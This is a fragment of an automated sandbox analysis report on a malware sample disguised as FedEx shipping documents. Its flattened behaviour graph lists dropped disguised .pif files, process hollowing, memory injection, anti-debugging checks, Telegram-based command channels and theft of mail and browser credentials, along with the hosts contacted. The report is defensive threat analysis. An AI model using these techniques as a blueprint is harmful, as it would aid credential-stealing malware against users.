        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617727 Sample: FEDEX_SHIPPING_DOCUMENTS_MU... Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 54 reallyfreegeoip.org 2->54 56 api.telegram.org 2->56 58 2 other IPs or domains 2->58 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 78 14 other signatures 2->78 8 FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe 1 8 2->8         started        12 Mxhvdwzh.PIF 2->12         started        14 Mxhvdwzh.PIF 2->14         started        signatures3 74 Tries to detect the country of the analysis system (by using the IP) 54->74 76 Uses the Telegram API (likely for C&C communication) 56->76 process4 file5 38 C:\Windows \SysWOW64\svchost.pif, PE32+ 8->38 dropped 40 C:\Windows \SysWOW6440ETUTILS.dll, PE32+ 8->40 dropped 42 C:\Users\Public\Libraries\hzwdvhxM.pif, PE32 8->42 dropped 44 2 other malicious files 8->44 dropped 80 Drops PE files with a suspicious file extension 8->80 82 Writes to foreign memory regions 8->82 84 Allocates memory in foreign processes 8->84 86 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->86 16 hzwdvhxM.pif 15 2 8->16         started        20 cmd.exe 1 8->20         started        22 cmd.exe 3 8->22         started        88 Multi AV Scanner detection for dropped file 12->88 90 Sample uses process hollowing technique 12->90 92 Allocates many large memory junks 12->92 24 hzwdvhxM.pif 12->24         started        26 hzwdvhxM.pif 14->26         started        signatures6 process7 dnsIp8 48 checkip.dyndns.com 132.226.8.169, 49706, 49709, 49711 UTMEMUS United States 16->48 50 api.telegram.org 149.154.167.220, 443, 49727, 49752 TELEGRAMRU United Kingdom 16->50 52 reallyfreegeoip.org 104.21.32.1, 443, 49707, 49708 CLOUDFLARENETUS United States 16->52 60 Detected unpacking (changes PE section rights) 16->60 62 Detected unpacking (overwrites its own PE header) 16->62 64 Tries to steal Mail credentials (via file / registry access) 16->64 28 extrac32.exe 1 20->28         started        32 conhost.exe 20->32         started        34 ndpha.pif 20->34         started        36 conhost.exe 22->36         started        66 Tries to harvest and steal browser information (history, passwords, etc) 26->66 signatures9 process10 file11 46 C:\Users\Public\ndpha.pif, PE32 28->46 dropped 94 Drops PE files to the user root directory 28->94 96 Drops PE files with a suspicious file extension 28->96 signatures12

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.